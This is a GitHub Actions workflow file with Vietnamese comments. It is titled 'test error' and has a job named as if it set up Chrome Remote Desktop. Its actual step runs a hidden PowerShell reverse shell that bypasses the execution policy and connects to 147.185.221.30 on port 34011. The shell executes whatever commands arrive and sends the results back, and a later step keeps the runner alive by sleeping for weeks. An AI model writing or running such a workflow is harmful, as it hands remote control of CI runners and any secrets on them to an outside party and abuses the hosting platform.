name: test error

on:
  workflow_dispatch: # Vẫn cho phép chạy thủ công
  push:
    branches:
      - main   # Hoặc nhánh bạn đang dùng
    paths:
      - .github/workflows/** # Khi bất kỳ file workflow nào bị chỉnh sửa

jobs:
  setup-chrome-rd:
    runs-on: windows-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: 1
        run: |
            powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('147.185.221.30',34011); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535 | ForEach-Object {0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }"
    
      - name: Wait2
        run: Start-Sleep -Seconds 2147483
